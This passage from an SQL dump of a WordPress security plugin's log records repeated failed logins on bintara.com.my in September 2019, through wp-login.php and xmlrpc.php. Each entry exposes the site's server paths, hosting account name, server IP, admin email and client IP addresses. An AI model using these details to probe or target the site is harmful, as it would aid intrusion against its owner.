06:57:38',18255128,19554528,'https://bintara.com.my/xmlrpc.php',1,0,'50.63.165.245'),(23996,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"87\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"162.144.134.39\";s:11:\"REMOTE_PORT\";s:5:\"33850\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX8zZgavjo3v4tJT4rvZgwAAAIw\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568617319.0383\";s:12:\"REQUEST_TIME\";s:10:\"1568617319\";}}','notice','2019-09-16 07:02:00','2019-09-16 07:01:59',17737768,19229592,'https://bintara.com.my/wp-login.php',1,0,'162.144.134.39'),(23997,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"162.144.134.39\";s:11:\"REMOTE_PORT\";s:5:\"34446\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX8zagavjo3v4tJT4rvZiQAAAJQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568617322.3204\";s:12:\"REQUEST_TIME\";s:10:\"1568617322\";}}','notice','2019-09-16 07:02:03','2019-09-16 07:02:02',18255296,19553224,'https://bintara.com.my/xmlrpc.php',1,0,'162.144.134.39'),(23998,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"202.154.188.12\";s:11:\"REMOTE_PORT\";s:5:\"37014\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX80yWCCaIOMm5l5jJE4hAAAAQ4\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568617673.5841\";s:12:\"REQUEST_TIME\";s:10:\"1568617673\";}}','notice','2019-09-16 07:07:55','2019-09-16 07:07:54',17743752,19231448,'https://bintara.com.my/wp-login.php',1,0,'202.154.188.12'),(23999,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"202.154.188.12\";s:11:\"REMOTE_PORT\";s:5:\"37014\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX80yWCCaIOMm5l5jJE4hAAAAQ4\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568617673.5841\";s:12:\"REQUEST_TIME\";s:10:\"1568617673\";}}','notice','2019-09-16 07:07:55','2019-09-16 07:07:54',17905616,19231448,'https://bintara.com.my/wp-login.php',1,0,'202.154.188.12'),(24000,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"202.154.188.12\";s:11:\"REMOTE_PORT\";s:5:\"37996\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX80zL1rBLb0GV3O7mTWfQAAAEI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568617676.0976\";s:12:\"REQUEST_TIME\";s:10:\"1568617676\";}}','notice','2019-09-16 07:07:57','2019-09-16 07:07:56',18255792,19556400,'https://bintara.com.my/xmlrpc.php',1,0,'202.154.188.12'),(24001,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"91.227.6.17\";s:11:\"REMOTE_PORT\";s:5:\"39740\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX82Iwavjo3v4tJT4rvbPgAAAJc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568618019.3675\";s:12:\"REQUEST_TIME\";s:10:\"1568618019\";}}','notice','2019-09-16 07:13:41','2019-09-16 07:13:39',17737784,19226560,'https://bintara.com.my/wp-login.php',1,0,'91.227.6.17'),(24002,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"91.227.6.17\";s:11:\"REMOTE_PORT\";s:5:\"40376\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX82J2CCaIOMm5l5jJE4tAAAAQY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568618023.3661\";s:12:\"REQUEST_TIME\";s:10:\"1568618023\";}}','notice','2019-09-16 07:13:44','2019-09-16 07:13:43',18257256,19556464,'https://bintara.com.my/xmlrpc.php',1,0,'91.227.6.17'),(24003,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"88.135.36.50\";s:11:\"REMOTE_PORT\";s:5:\"43808\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX83Xwavjo3v4tJT4rvb4wAAAIY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568618335.6191\";s:12:\"REQUEST_TIME\";s:10:\"1568618335\";}}','notice','2019-09-16 07:18:57','2019-09-16 07:18:55',17739056,19229504,'https://bintara.com.my/wp-login.php',1,0,'88.135.36.50'),(24004,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"88.135.36.50\";s:11:\"REMOTE_PORT\";s:5:\"44456\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX83Ygavjo3v4tJT4rvb5QAAAI0\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568618338.9935\";s:12:\"REQUEST_TIME\";s:10:\"1568618338\";}}','notice','2019-09-16 07:19:00','2019-09-16 